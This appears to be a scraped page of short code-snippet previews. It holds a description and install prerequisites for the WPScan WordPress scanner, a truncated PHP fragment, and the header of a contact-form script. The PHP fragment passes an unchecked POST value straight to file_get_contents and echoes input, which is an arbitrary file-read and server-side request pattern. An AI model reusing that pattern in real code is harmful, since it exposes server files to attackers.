WPScan is a black box WordPress vulnerability scanner.
- Ubntu server
- libcurl4-gnutls-dev, libopenssl-ruby, libxml2, libxml2-dev, libxslt1-dev, ruby-dev
- Git
- Ruby and RubyGems with RVM
<?php | |
$n=$_POST["n"]; | |
$g=$_POST["g"]; | |
$w=$_POST["w"]; | |
$gg=file_get_contents($g); | |
echo $n; | |
if($_POST["g"]){ | |
$nn = $gg; | |
} | |
if($_POST["w"]){ |
<?php | |
/////////////////////////////////////////////////////// | |
//AUTHOR: Mathieu Dombrock | |
//BASED ON THE WORK OF: Saran Chamling | |
//LICENSE: http://opensource.org/licenses/MIT | |
//Portable & Responsive Ajax Form | |
//Capable of sending to multiple recipients. | |
/////////////////////////////////////////////////////// | |
if($_POST) | |
{ |